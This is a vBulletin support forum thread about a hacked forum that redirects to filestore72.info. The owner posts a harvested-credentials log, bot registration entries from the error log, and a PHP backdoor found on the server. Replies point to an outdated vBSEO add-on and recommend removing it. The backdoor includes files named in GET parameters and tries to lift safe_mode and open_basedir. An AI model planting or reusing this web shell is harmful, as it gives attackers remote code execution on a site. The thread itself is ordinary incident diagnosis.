Have you looked through your access_logs to see what is going on?
Vbulletin 4.2.0 pl3 hacked redirect to filestore72.info
Collapse
X
-
Please don't PM or VM me for support - I only help out in the threads.
vBulletin Manual & vBulletin 4.0 Code Documentation (API)
Want help modifying your vbulletin forum? Head on over to vbulletin.org
If I post CSS and you don't know where it goes, throw it into the additional.css template.
W3Schools <- awesome site for html/css help -
Ok I'm digging deeper.
I just found a file called my.log in the root of the forum. It contains 2 users info ... like this:
Code:Array ( [userid] => 11582 [usergroupid] => 25 [membergroupids] => [infractiongroupids] => [username] => username here [password] => password here [salt] => salt code here [email] => email.address.here )
Code:[Sun Nov 10 06:36:29 2013] [error] [client 178.151.216.90] (36)File name too long: access to /index.php++++++++++++++++++++++++++++++++++++++++++++++++Result:+\xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed+\xed\xe8\xea\xed\xe5\xe9\xec+"Myncalleleabs";+\xe2\xf5\xee\xe4+\xe2+\xe0\xea\xea\xe0\xf3\xed\xf2+\xed\xe5+\xf3\xe4\xe0\xeb\xf1\xff;+Result:+\xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed+\xed\xe8\xea\xed\xe5\xe9\xec+"Guedgecrele";+\xe2\xf5\xee\xe4+\xe2+\xe0\xea\xea\xe0\xf3\xed\xf2+\xed\xe5+\xf3\xe4\xe0\xeb\xf1\xff;+Result:+\xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed+\xed\xe8\xea\xed\xe5\xe9\xec+"Guedgecrele";+\xe2\xf5\xee\xe4+\xe2+\xe0\xea\xea\xe0\xf3\xed\xf2+\xed\xe5+\xf3\xe4\xe0\xeb\xf1\xff;+Result:+\xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed+\xed\xe8\xea\xed\xe5\xe9\xec+"Myncalleleabs";+\xe2\xf5\xee\xe4+\xe2+\xe0\xea\xea\xe0\xf3\xed\xf2+\xed\xe5+\xf3\xe4\xe0\xeb\xf1\xff; failed, referer: http://forum.censored.de/index.php++++++++++++++++++++++++++++++++++++++++++++++++Result:+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%ED+%ED%E8%EA%ED%E5%E9%EC+%22Myncalleleabs%22;+%E2%F5%EE%E4+%E2+%E0%EA%EA%E0%F3%ED%F2+%ED%E5+%F3%E4%E0%EB%F1%FF;+Result:+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%ED+%ED%E8%EA%ED%E5%E9%EC+%22Guedgecrele%22;+%E2%F5%EE%E4+%E2+%E0%EA%EA%E0%F3%ED%F2+%ED%E5+%F3%E4%E0%EB%F1%FF;+Result:+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%ED+%ED%E8%EA%ED%E5%E9%EC+%22Guedgecrele%22;+%E2%F5%EE%E4+%E2+%E0%EA%EA%E0%F3%ED%F2+%ED%E5+%F3%E4%E0%EB%F1%FF;+Result:+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%ED+%ED%E8%EA%ED%E5%E9%EC+%22Myncalleleabs%22;+%E2%F5%EE%E4+%E2+%E0%EA%EA%E0%F3%ED%F2+%ED%E5+%F3%E4%E0%EB%F1%FF; [Sun Nov 10 06:37:26 2013] [error] [client 74.91.17.226] (36)File name too long: access to /index.php+++++++++++++++++++++++++++++++++Result:+using+proxy+184.73.192.181:3128;+GET-timeouts+1;+chosen+nickname+"bamilesqshuzea3914";+ReCaptcha+decoded;+(JS);+registered+(registering+only+mode+is+ON);+TryAntiSFS=1;+Result:+chosen+nickname+"bjnessdark9685";+ReCaptcha+decoded;+(JS);+registered+(registering+only+mode+is+ON);+TryAntiSFS=1; failed, referer: http://forum.censored/index.php+++++++++++++++++++++++++++++++++Result:+using+proxy+184.73.192.181:3128;+GET-timeouts+1;+chosen+nickname+%22bamilesqshuzea3914%22;+ReCaptcha+decoded;+%28JS%29;+registered+%28registering+only+mode+is+ON%29;+TryAntiSFS=1;+Result:+chosen+nickname+%22bjnessdark9685%22;+ReCaptcha+decoded;+%28JS%29;+registered+%28registering+only+mode+is+ON%29;+TryAntiSFS=1;
Code:<? echo ini_get("safe_mode"); echo ini_get("open_basedir"); include($_GET["file"]); ini_restore("safe_mode"); ini_restore("open_basedir"); echo ini_get("safe_mode"); echo ini_get("open_basedir"); include($_GET["ss"]); ?>
Comment
-
up.
I deleted that PHP.INI.
I aso found a new my.log file on the root.Comment
-
Hey guys, I am working on a client site with a similar issue and I believe it is tied to the use of Vbseo 3.6. He is using Vbulletin 4.2 but still has Vbseo 3.6 and seeing as Vbseo no longer exists he has no way to get the latest version. Is there a patch available to fix this without doing an upgrade?
ThanksComment
-
-
I have done the best I can to make it secure but my advice would be to remove that old version. What do you think Joe? I always value your opinions.
ThanksComment
-
Yes, I would uninstall VBSEO
VBSEO is down but luckily the uninstall instructions with the URL Rewrite rules so links don't break is still available in the "Way Back" machine - http://web.archive.org/web/201301221...all-vbseo-238/Comment
Related Topics
Collapse
-
by DanloonaHi again.
I got issue with redirection.
How I can redirect https://www.domain.co.uk to https://domain.co.uk ?
I've added redirection on hosting panel but looks like...-
Channel: Support Issues & Questions
Mon 8 Oct '18, 4:32am -
Comment